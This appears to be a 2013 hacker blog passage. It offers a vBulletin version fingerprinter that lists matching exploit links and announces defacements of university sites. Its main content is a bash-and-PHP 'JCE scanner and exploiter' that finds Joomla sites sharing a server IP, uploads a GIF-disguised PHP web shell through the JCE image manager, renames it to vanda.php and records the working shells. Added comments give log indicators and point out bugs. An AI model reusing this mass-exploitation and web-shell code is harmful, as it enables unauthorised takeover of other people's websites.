Tuesday, November 19, 2013

[V]bulletin Security Fingerprinter v1.0

Hi guys. [V]bulletin Security Fingerprinter v1.0


#!/bin/bash
#
# VB-SFp - v1.0 [ public release ] - 240
#
#  RHH - Vbulletin Security Fingerprinter
#
# Author: Red V!per
#   Date: 2013 19 November
#    Web: www.redhathackers.org
# E-mail: beni_vanda[at]yahoo[dot]com
#
#

# Intended delay between requests. Nothing in the visible script reads TIME,
# so the probes are sent back to back.
TIME="0"          # sleep time among each request
CURL="/usr/bin/curl"
# Defined but not used by the visible code: Get_Version calls egrep directly.
GREP="/bin/grep"
CUT="/usr/bin/cut"

# ANSI SGR escape sequences: bold, reset, blink, reset. Only B and N are
# referenced by the visible code.
B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"

# Prefix printed in front of every exploit-database link.
STRXPL="$B[+] EXPLOIT:$N"
# Global result slot: written by Get_Version (or by the manual prompt) and
# read by Fingerpirint.
Version=''
# Fixed Internet Explorer 7 style string meant for curl's -A option. It is
# expanded unquoted in Get_Version, so only its first word ("Mozilla/4.0")
# ends up as the -A value.
USER_AGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"



# First positional argument: base URL of the forum installation (see Usage).
url=$1
# Static asset paths requested in this order by Check_Vbulletin_Version.
# Get_Version searches each response for the text "vBulletin <digit>...", so
# these are presumably files whose header comment carries a version banner.
# Defensive reading: a burst of requests for these CSS/JS paths from one
# client is what a run of this script looks like in an access log, and
# version text left in publicly served static files is the disclosure it
# depends on.
vbulletin=( 
/archive/archive.css 
/clientscript/vbulletin_ajax_htmlloader.js
/clientscript/vbulletin_ajax_imagereg.js
/clientscript/vbulletin_ajax_namesugg.js
/clientscript/vbulletin_ajax_nameverif.js
/clientscript/vbulletin_ajax_quote.js
/clientscript/vbulletin_ajax_reputation.js
/clientscript/vbulletin_ajax_search.js
/clientscript/vbulletin_ajax_taglist.js
/clientscript/vbulletin_ajax_tagsugg.js
/clientscript/vbulletin_ajax_threadrate.js
/clientscript/vbulletin_ajax_threadslist.js
/clientscript/vbulletin_ajax_userlist.js
/clientscript/vbulletin_ajax_wolresolve.js
/clientscript/vbulletin_album.js
/clientscript/vbulletin_attachment.js
/clientscript/vbulletin_backgroundpicker.js
/clientscript/vbulletin_colorpicker.js
/clientscript/vbulletin_cpcolorpicker.js
/clientscript/vbulletin_cphome_scripts.js
/clientscript/vbulletin_cpoptions_scripts.js
/clientscript/vbulletin_custom_profile.js
/clientscript/vbulletin_date_picker.css
/clientscript/vbulletin_date_picker.js
/clientscript/vbulletin_editor.css
/clientscript/vbulletin_global.js
/clientscript/vbulletin_group_read_marker.js
/clientscript/vbulletin_important.css
/clientscript/vbulletin_inlinemod.js
/clientscript/vbulletin_lightbox.js
/clientscript/vbulletin_md5.js
/clientscript/vbulletin_menu.js
/clientscript/vbulletin_multi_quote.js
/clientscript/vbulletin_notifications_nopopups.js
/clientscript/vbulletin_post_loader.js
/clientscript/vbulletin_profilefield_edit.js
/clientscript/vbulletin_quick_comment.js
/clientscript/vbulletin_quick_comment_generic.js
/clientscript/vbulletin_quick_edit_groupmessage.js
/clientscript/vbulletin_quick_edit_picturecomment.js
/clientscript/vbulletin_quick_edit_visitormessage.js
/clientscript/vbulletin_quick_reply.js
/clientscript/vbulletin_read_marker.js
/clientscript/vbulletin_settings_validate.js
/clientscript/vbulletin_tabctrl.css
/clientscript/vbulletin_tabctrl.js
/clientscript/vbulletin_tabctrl_rtl.css
/clientscript/vbulletin_templatemgr.js
/clientscript/vbulletin_textedit.js
/clientscript/vbulletin_thrdpostlist.js
/clientscript/vbulletin_quick_edit.js
/clientscript/vbulletin_quick_edit_generic.js
/cpstyles/vBulletin_2_Default/controlpanel.css
/cpstyles/vBulletin_3_Default/controlpanel.css
/cpstyles/vBulletin_3_Frontend/controlpanel.css
/cpstyles/vBulletin_3_Manual/controlpanel.css
/cpstyles/vBulletin_3_Silver/controlpanel.css
)

Banner()
{
# Print the ASCII-art logo in green ('\E[32m'), resetting terminal attributes
# with `tput sgr0` after every line, then a bold title box.
# Globals: B, N (read). Writes to stdout only.
echo -e '\E[32m'"                                                     "; tput sgr0
echo -e '\E[32m'" __      ______    ______ _                          "; tput sgr0
echo -e '\E[32m'" \ \    / /  _ \  |  ____(_)                         "; tput sgr0
echo -e '\E[32m'"  \ \  / /| |_) | | |__   _ _ __   __ _  ___ _ __    "; tput sgr0
echo -e '\E[32m'"   \ \/ / |  _ <  |  __| | | '_ \ / _\ |/ _ \ '__|   "; tput sgr0
echo -e '\E[32m'"    \  /  | |_) | | |    | | | | | (_| |  __/ |      "; tput sgr0
echo -e '\E[32m'"     \/   |____/  |_|_   |_|_| |_|\__, |\___|_|      "; tput sgr0
echo -e '\E[32m'"            (_)     | |            __/ |             "; tput sgr0
echo -e '\E[32m'"  _ __  _ __ _ _ __ | |_ ___ _ __ |___/              "; tput sgr0
echo -e '\E[32m'" | '_ \| '__| | '_ \| __/ _ \ '__|                   "; tput sgr0
echo -e '\E[32m'" | |_) | |  | | | | | ||  __/ |                      "; tput sgr0
echo -e '\E[32m'" | .__/|_|  |_|_| |_|\__\___|_|                      "; tput sgr0
echo -e '\E[32m'" | |                                                 "; tput sgr0
echo -e '\E[32m'" |_|                                                 "; tput sgr0
echo -e 
# Title box: $B switches bold on here and $N resets it on the last line.
echo -e "$B         -.-.-.-.-.-.-.-.-#-#-#-#-#-#-#-#-#-#-.-.-.-.-.-.-.-       "
echo -e "         -       [V]bulletin Security Fingerprinter v1.0     -"
echo -e "-#-#-#-#-      Cod3d By: Red V!per [wWw.RedHatHackers.org]      -#-#-#-#-"
echo -e "         -                  IN GOD WE TRUST                  -"
echo -e "          -.-.-.-.-.-.-.-.-#-#-#-#-#-#-#-#-#-#-.-.-.-.-.-.-.-      $N "
echo 
}

Usage()
{
# Clear the screen, print the help text and terminate the script with
# status 1. Because of the exit below, nothing a caller places after a call
# to Usage is reached.
# Globals: B, N (read).
clear
echo
echo -e "$B  VB-SFp - v1.0 [public] - 240\n"
echo -e " -=============================================-\n"
echo -e "    <victim>                ->$N URL to victim installed Vbulletin"
echo -e "                               example: http://www.victim.com/vb\n"
echo -e "\n Run:$B ./VB-SFp.sh <victim> $N\n"
exit 1
}

Check_Arguments()
{
  # Show the help text and stop when no target was given or when help was
  # requested with -h / --help; otherwise fall through and return.
  # Globals: url (read).
  case "$url" in
    ''|-h|--help)
      Usage
      exit
      ;;
  esac
}

Check_Vbulletin_Version()
{
# Request the paths in the vbulletin array one after another until
# Get_Version sets a non-empty Version, then print the report.
# Globals: vbulletin (read), Version (read; written by Get_Version or by the
#          prompt below), B (read).
# A run therefore issues between one request and one per array entry; there
# is no sleep between them.
for arr in "${vbulletin[@]}"
do
 Get_Version $arr

if [ ! -z "$Version" ];then
  break;
fi

done

# Fallback: no response contained a version string, so ask the operator.
# The typed value is passed on as-is; it is not checked for format, and
# `read` is used without -r.
if [ -z "$Version" ] 
 then
   echo -e "$B  [~] Not Found Version :| "
   read -p "  [~] Please Give Version Manual : " Version 
   echo
fi
Fingerpirint
}

Fingerpirint() 
{
# Print the target, the detected version and every exploit-database link whose
# version rule matches $Version.
# Globals: url, Version, B, STRXPL (all read); res1, res2 (written).
#
# NOTE(review): the output is not a reliable statement about exposure.
#  - `expr A '<=' B` compares as strings unless both operands are integers,
#    so dotted versions are ordered textually (in byte order "4.1.10" sorts
#    before "4.1.3"), and operands such as '4.0.*' or '3.*.*' are literal
#    text there, not wildcards. Only the [[ ... == pattern ]] tests glob.
#  - $Version is expanded unquoted. An empty or multi-word value makes expr
#    fail, and the numeric test that follows then errors out.
#  - $Version comes from the remote response or from the manual prompt and is
#    printed with `echo -e`, which interprets backslash escapes in it.
# Whether an installation is affected should be decided from the vendor's
# advisories for the exact version and patch level, not from this list.
echo -e "$B  [*] Target :\e[1;35m $url \e[0m"
echo -e "$B  [*] Version :\e[1;32m $Version [Ok] \e[0m"
echo
echo -e "$B  [*] \e[1;32m Avaliable Exploits for\e[0m \e[1;35m$Version \e[0m:" 
echo 

if [[ $Version == 3.8.4 ]] || [[ $Version == 3.8.5 ]] ; then
          echo -e "  $STRXPL http://1337day.com/exploit/13911     (= 3.8.4 | 3.8.5)"
          echo
fi

if [[ $Version == 3.8.6 ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/13459     (= 3.8.6 )"
          echo
fi

if [[ $Version == 4.0.4 ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/13743     (= 4.0.4 )"
          echo
fi

if [[ $Version == 4.0.8 ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/14877     (= 4.0.8 )"
          echo
          echo -e "  $STRXPL http://1337day.com/exploit/14924     (= 4.0.8 PL1 )"
          echo
fi

if [[ $Version == 3.6.8 ]] || [[ $Version == 3.7.* ]] ; then
          echo -e "  $STRXPL http://1337day.com/exploit/15531     (= 3.6.8| 3.7.x )"
          echo
fi

if [[ $Version == 3.8.* ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/15549     (= 3.8.x )"
          echo
fi

if [[ $Version == 3.1* ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/15822     (= 3.1x )"
          echo
fi

# Range checks from here on use expr; see the note at the top of the function.
res1=`expr $Version '<=' '4.1.3'`
res2=`expr $Version '>=' '4.0.*'`
if [ $res1 -eq 1 -a $res2 -eq 1 ];
then
          echo -e "  $STRXPL http://1337day.com/exploit/16548     ( 4.0.x => 4.1.3 )"
          echo
fi

res1=`expr $Version '<=' '4.1.10'`
res2=`expr $Version '>=' '4.1.7'`
if [ $res1 -eq 1 -a $res2 -eq 1 ];
then
          echo -e "  $STRXPL http://1337day.com/exploit/17824     ( 4.1.7 => 4.1.10 )"
          echo
fi

if [[ $Version == 3.*.* ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/18902     (= 3.x.x )"
          echo
fi


if [[ $Version == 4.0.* ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/16160     (= 4.0.x )"
          echo
fi

# NOTE(review): the upper bound tested here is 4.1.2, while the label printed
# below says 4.1.3.
res1=`expr $Version '<=' '4.1.2'`
res2=`expr $Version '>=' '4.0.*'`
if [ $res1 -eq 1 -a $res2 -eq 1 ];
then
          echo -e "  $STRXPL http://1337day.com/exploit/16147     ( 4.0.x => 4.1.3 )"
          echo
fi

if [[ $Version == 3.8.* ]] || [[ $Version == 4.*.* ]] ; then
          echo -e "  $STRXPL http://1337day.com/exploit/11737     (= 3.8.x|4.x.x )"
          echo
          echo -e "  $STRXPL http://1337day.com/exploit/20984     (= 3.8.x|4.x.x )"
          echo
fi

if [[ $Version == 4.0.2 ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/19293     (= 4.0.2 )"
          echo
fi

if [[ $Version == 3.*.* ]] || [[ $Version == 4.*.* ]] ; then
          echo -e "  $STRXPL http://1337day.com/exploit/19677     (= 3.x.x|4.x.x )"
          echo
fi

res1=`expr $Version '<=' '1.1.9'`
if [ $res1 -eq 1 ];
then
          echo -e "  $STRXPL http://1337day.com/exploit/19722     ( <= 1.1.9 )"
          echo
fi

res1=`expr $Version '<=' '4.2.0'`
res2=`expr $Version '>=' '3.*.*'`
if [ $res1 -eq 1 -a $res2 -eq 1 ];
then
          echo -e "  $STRXPL http://1337day.com/exploit/19862     ( 3.x => 4.2.0 )"
          echo
fi

if [[ $Version == 4.2.0 ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/19874     (= 4.2.0 )"
          echo
fi

if [[ $Version == 5.0.0 ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/19956    (= 5.0.0 )"
          echo
          echo -e "  $STRXPL http://1337day.com/exploit/description/20002    (= 5.0.0 )"
          echo
          echo -e "  $STRXPL http://1337day.com/exploit/description/20403    (= 5.0.0 )"
          echo
fi

if [[ $Version == 4.*.* ]] || [[ $Version == 5.*.* ]] ; then
          echo -e "  $STRXPL http://1337day.com/exploit/20983     (= 4.x.x|5.x.x )"
          echo
          echo -e "  $STRXPL http://1337day.com/exploit/description/21518     (= 4.x.x|5.x.x )"
          echo
fi

# NOTE(review): same condition and same link (20984) as an earlier check in
# this function, so the entry is printed twice.
if [[ $Version == 3.8.* ]] || [[ $Version == 4.*.* ]] ; then
          echo -e "  $STRXPL http://1337day.com/exploit/20984     (= 3.8.x|4.x.x )"
          echo
fi

if [[ $Version == 4.0.* ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/21029     (= 4.0.x )"
          echo
fi


}

Get_Version() 
{
 # Fetch "$url/$1" and store in the global Version whatever follows
 # "vBulletin " in the response, cut at the first space.
 # Arguments: $1 - path from the vbulletin array (each starts with "/", so
 #                 the requested URL always contains "//" after the base URL).
 # Globals:   CURL, USER_AGENT, CUT, url (read); req, Version (written).
 #
 # NOTE(review): what reaches the wire differs from what the variables suggest.
 #  - `-silent` has a single dash; curl reads such a cluster as short options,
 #    presumably -s -i -l -e nt (i.e. headers included, Referer "nt") rather
 #    than --silent - confirm against the curl version in use.
 #  - $USER_AGENT is unquoted, so -A receives only "Mozilla/4.0" and the
 #    remaining words are passed to curl as further arguments.
 # For log matching, the requested asset paths and the doubled slash are
 # steadier indicators than the User-Agent string defined at the top.
 req=`$CURL -silent -A $USER_AGENT "$url/$1"` 

 # egrep -o prints every match on its own line, so Version can hold several
 # lines when the response mentions the product name more than once. The
 # value is taken from the remote server and is not validated.
 Version=`echo "$req" | egrep -o 'vBulletin [0-9][^b]+' | awk '{gsub("vBulletin ","")}1' |$CUT -d ' ' -f 1`
}

# Entry point: validate the argument, print the banner, then probe the target
# and list the matching links.
Check_Arguments;
Banner
Check_Vbulletin_Version;
Download : http://www.mediafire.com/download/58ssjy6uikt59qw/vb-fingerprinter.sh

Sunday, September 8, 2013

SAPIENZA UNIVERSITA DI ROMA WAS HACKED

http://www.th3mirror.com/mirror/id/435812/
http://zone-hc.com/archive/mirror/1e9bc13_w3.disg.uniroma1.it_mirror_.html

3CA Get Alexa Rank



List your sites in an alexa.lst file next to the bash script, make the script executable (chmod +x script.sh), then run it (./script.sh).

#!/bin/bash
# 3CA Get Alexa Rank 
# Usage : insert your sites in  alexa.lst file beside bash script and give permission to bash script (chmod +x script.sh) Then Run it (./script.sh) !!
#Coded by : Red V!per

# ANSI SGR escape sequences: bold, reset, blink, reset. Only B is referenced
# by the code below.
B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"


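get_rank()
{
  # Look up the Alexa global rank of one site and record it.
  # Arguments: $1 - site name as used in http://www.alexa.com/siteinfo/<site>
  # Globals:   B (read) - bold escape sequence
  # Outputs:   one status line on stdout; appends "<site> [<rank>]" to
  #            alexa_rank.lst in the current directory when a rank is found
  # Returns:   non-zero only when no temporary file could be created
  local site=$1
  local page rank

  # The download goes to a private temporary file instead of the fixed name
  # alexa.php in the working directory. The fixed name was removed with
  # `rm -rf` before and after each lookup, which deletes a directory of that
  # name recursively, and wget -O would write through a symlink placed there.
  page=$(mktemp) || return 1

  wget -q --user-agent="Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" -O "$page" "http://www.alexa.com/siteinfo/$site"

  # The rank is picked out positionally from the line containing
  # "Global rank", so it depends on the exact markup of the page.
  rank=$(grep "Global rank" "$page" | cut -d '"' -f 5 | cut -d '>' -f 2 | cut -d '<' -f 1)
  rm -f -- "$page"

  if [ -n "$rank" ]; then
    echo -e "$B[+] $site \e[1;32m[$rank] \e[0m"
    echo "$site [$rank]" >> alexa_rank.lst
  else
    echo -e "$B[-] $site \e[1;31m[-] \e[0m"
  fi
}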


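# Look up every site listed in alexa.lst, one entry per line. Reading the file
# line by line (instead of word-splitting the output of cat) keeps an entry
# from being glob-expanded against the working directory. The list is read
# on descriptor 3 so that get_rank and its children keep the script's stdin.
while read -r alexa <&3 || [ -n "$alexa" ]; do
  # Skip blank lines.
  [ -n "$alexa" ] || continue
  get_rank "$alexa"
done 3< alexa.lst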


Estudar em Lisboa && ISEC University Hacked


Estudar em Lisboa && ISEC University Hacked

http://zone-h.org/mirror/id/20735001
http://zone-h.org/mirror/id/20735008

Tuesday, August 27, 2013

Red V!per Server Jce Scanner && Exploiter











D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4


insert jce.php beside bash script :

 
#!/bin/bash
# Jce Server Scanner && Exploiter
# Coded By : Red V!per
# http://redhat-viper.blogspot.com
# Report Bugs : RedH4t.Viper@yahoo.com
# D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
# Gr33tz   : All Turkish && Persian Hacker
#--------------------------------------------------------------------------------------------------------------------
#
# Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com
# devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
#


#-------------------- Red V!per Banner ----------------------------------------------------------------------------
Banner()
{
# Clear the screen, draw the framed logo (blue frame, red and green lettering),
# pause three seconds, print the title and prompt for the address to work on.
# Globals: B, N (read); IP (written by the prompt).
clear
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||                                                      || "; tput sgr0
echo -e '\E[34m'" ||\E[31m  _____          _  __      ___                       \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |  __ \        | | \ \    / / |                      \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | |__) |___  __| |  \ \  / /| |_ __   ___ _ __       \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |  _  // _ \/ _\ |   \ \/ / | | '_ \ / _ \ '__|      \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \ \  __/ (_| |    \  /  |_| |_) |  __/ |         \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_|  \_\___|\__,_|     \/   (_) .__/ \___|_|         \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m                               | |                    \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m                               |_|                    \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m   _                                                  \E[34m|| "; tput sgr0   
echo -e '\E[34m'" ||\E[32m  (_)                                                 \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m   _  ___ ___   ___  ___ __ _ _ __  _ __   ___ _ __   \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__|  \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | | (_|  __/ \__ \ (_| (_| | | | | | | |  __/ |     \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_|     \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _/ |                                                 \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m|__/                                                  \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
sleep 3
echo
echo -e "$B /\ (^_^) /\ [public] \n"
echo -e " -===============================================-\n"
echo -e "   Server Jce Scanner && Exploiter"
echo
echo -e "   BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [         INFO         ] ===========-"
echo
# The typed value is stored verbatim; scan_jce_on_victim later places it in a
# search URL without checking that it is an address.
read -p "[*] Target Ip : " IP
echo -e "$N"
}

#-------------------- Variables ----------------------------------------------------------------------------

# ANSI SGR escape sequences: bold, reset, blink, reset. The functions in this
# script reference only B and N.
B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"

#-------------------- Scanning Jce Targets on Server  -------------------------------------------------------

scan_jce_on_victim()
{
# Collect the sites a search engine lists for $IP, probe each one for the JCE
# image manager and pass responders to jce.php.
# Globals: IP (read, set by Banner), B (read); page, how_many, single_page,
#          last_page_check, image_manager, url, check, check2 (written).
# Files:   works through domain_bing.php, alldomain_bing.txt, domains.txt,
#          site.lst and shells.lst in the current directory and appends hits
#          to vanda_shells.lst.
#
# Defensive reading - what this function leaves in a site's access log:
#  - a request for index.php?option=com_jce&task=plugin&plugin=imgmanager&
#    file=imgmanager&version=1576&cid=20, always on the www. host name,
#  - followed by a request for /images/stories/vanda.php.
# A .php file under images/stories/ whose content starts with "GIF89a1" is
# the artefact the final check looks for. Keeping the JCE component current
# and refusing to execute PHP from upload directories removes the
# precondition this tool relies on.
page=0
how_many=1
single_page=
last_page_check=
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"

 # Page through the search results until the result counter reports the last
 # page ("N-M of M"), is missing altogether, or shows a single-digit total.
 while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
 
url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"
 
 wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"
 
 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`
  
 how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`
 
 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `
 
 
  # egrep is given the file name, so the piped output of cat is ignored.
  cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
  rm -f domain_bing.php
  let page=$page+1 
  done
 
# Reduce the result links to bare lower-case host/path entries: keep links
# containing "com_", drop the scheme, "www" plus the following character
# (the dot in the sed pattern is unescaped), the query string and a trailing
# /index.php, then de-duplicate.
cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
 
for domain in `cat domains.txt`
   do
     # GET is presumably the lwp-request command (status line only) - confirm.
     # A status containing "OK" is treated as "image manager reachable".
     GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
      if [ $check -eq 0 ]
         then
           echo "www.$domain" > site.lst
           php jce.php site.lst shells.lst
        # Read-back of the fixed file name, checked for the "GIF89a1" marker.
        GET -s "http://www.$domain/images/stories/vanda.php" | grep "GIF89a1" >> /dev/null;check2=$?
        if [ $check2 -eq 0 ]
        then
        echo -e "$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
        echo -e "$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
        echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
        else
        echo "[-] www.$domain/ [No] "
        fi  
       else
         echo "[-] www.$domain/ [No] "
      fi  
   done
# Work files are removed; vanda_shells.lst is the only output kept.
rm -rf alldomain_bing.txt
rm -rf domains.txt
rm -rf site.lst
rm -rf shells.lst
}

#-------------------- Remove  ------------------------------------------------------------------------
all_remove()
{
 # Clear leftovers of a previous run from the current directory.
 # Each prefix is followed by an unquoted * so the shell expands it. The
 # patterns are broad (site*, domains*) and removal is recursive, so any
 # unrelated file or directory in the working directory whose name starts
 # with one of these prefixes is deleted as well.
 local leftover
 for leftover in alldomain_bing domains_f domain_bing domains jce_server site; do
   rm -rf "$leftover"*
 done
}

#-------------------- Main Brain :D  ------------------------------------------------------------------------
main()
{
# Orchestrates one run: prepare the helper files, prompt for the address,
# clear leftovers of earlier runs and start the scan.
# jce.php is marked executable here, although the scan invokes it through the
# php interpreter.
chmod +x jce.php

# jce.php is given shells.lst as its output file; create it if missing.
if [ ! -f shells.lst ]; then
    touch shells.lst ;
fi

Banner;
all_remove;
scan_jce_on_victim;
}

# Script entry point.
main;

jce.php  :

<?php

/*
# Mass Uploader  
# Coded By Mua & Keresteci
# Recoded By Red V!per
*/

    // Counters (Turkish: "cracked" / "scanned"). They are incremented in the
    // main loop but never printed by the visible code.
    $kirilmis = 0;

    $taranmis = 0;

    // All PHP errors and notices are suppressed, which also hides the
    // undefined variables used further down.
    error_reporting(0);

    // No execution time limit; socket operations give up after 3 seconds
    // unless a call passes its own timeout.
    ini_set("max_execution_time", 0);

    ini_set("default_socket_timeout", 3);

    // oku ("read" in Turkish): fetch $link with a hand-written HTTP/1.0 GET
    // over a plain TCP connection to port 80 and return the raw response,
    // status line and headers included.
    //
    // Only the host and path of $link are used; a query string is dropped.
    // The request carries a Host header and nothing else - in particular no
    // User-Agent - which is how it appears in a server log.
    function oku($link)

    {

        $site         = parse_url($link);

        $link         = $site["path"];

        $site         = $site["host"];

        // NOTE(review): this initialises $httpresponse, but the code below
        // appends to and returns $http_response. When the connection fails
        // the function returns an undefined variable.
        $httpresponse = "";

        $fp           = fsockopen($site, 80, $err_num, $err_msg, 30);

        if ($fp) {

            fputs($fp, "GET $link HTTP/1.0\r\nHost: $site\r\n\r\n");

            // Written after the blank line that ends the header block, so
            // the server does not see it as a request header.
            fputs($fp, "Connection: close\n\n");

            while (!feof($fp)) {

                $http_response .= fgets($fp, 128);

            }

            fclose($fp);

        }

        return $http_response;

    }

    // Main script body. For every line of the input list it derives a host
    // name and opens four plain-HTTP exchanges with port 80 of that host:
    // a marker string, a multipart upload to the JCE image manager, a JSON
    // folderRename call, and a read-back of the renamed file.
    //
    // Detection-relevant constants visible below (usable for log and IDS
    // matching on the receiving side):
    //   - the bare text "Mua-Kontrol-Paketi-Panpa" as the first bytes of a
    //     connection,
    //   - User-Agent "BOT/0.1 (BOT for JCE)" on the upload and "Mua " on the
    //     rename request,
    //   - multipart boundary ---------------------------41184676334 and the
    //     fixed cookie values,
    //   - upload file name mua.gif, renamed to vanda.php and then requested
    //     as /images/stories/vanda.php,
    //   - file content that begins with "GIF89a1" followed by a PHP open tag.
    //
    // argv[1]: list of sites, one per line. argv[2]: result file, opened
    // with mode 'w' and therefore truncated on every run.
    $dosya      = $argv[1];

    $kirilanlar = fopen($argv[2], 'w');

    $okunan = file($dosya);

    // Assigned but not read again in the visible code.
    $toplam = count($okunan);

    foreach ($okunan as $sira => $satir) {

        // Assigned but not read again in the visible code.
        $hatalisite = 0;

        $satir      = preg_replace("/[\\n\\r]+/", "", $satir);

        // Accept entries with or without a scheme; only the host is kept.
        $url        = parse_url($satir);

        if ($url["scheme"])

            $host = $url["host"];

        else {

            $url  = parse_url("http://" . $satir);

            $host = $url["host"];

        }


        // Exchange 1: a non-HTTP marker string; the reply is not read.
        $packet = "Mua-Kontrol-Paketi-Panpa";


        $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);

        if ($fp) {

            fwrite($fp, $packet);

            fclose($fp);

        }

        // Uploaded content: a GIF magic prefix followed by PHP that evaluates
        // base64-decoded text. The encoded body is elided in this copy.
        $content = "GIF89a1\n";

        $content .= '<?php eval("?>".base64_decode("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")); ?>';

        // Exchange 2: multipart form body for the image manager upload.
        $data = "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";

        $data .= "/\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";

        $data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";

        $data .= "0\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"mua.gif\"\r\n";

        $data .= "Content-Type: image/gif\r\n\r\n";

        $data .= "$content\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "0day\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";

        $data .= "upload\r\n";

        $data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";

        // $p is not defined anywhere in the visible code, so the request
        // path starts directly at /index.php.
        $packet = "POST " . $p . "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";

        $packet .= "Host: " . $host . "\r\n";

        $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";

        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";

        $packet .= "Accept-Language: en-us,en;q=0.5\r\n";

        $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

        $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";

        $packet .= "Connection: Close\r\n";

        $packet .= "Proxy-Connection: close\r\n";

        $packet .= "Content-Length: " . strlen($data) . "\r\n\r\n\r\n\r\n";

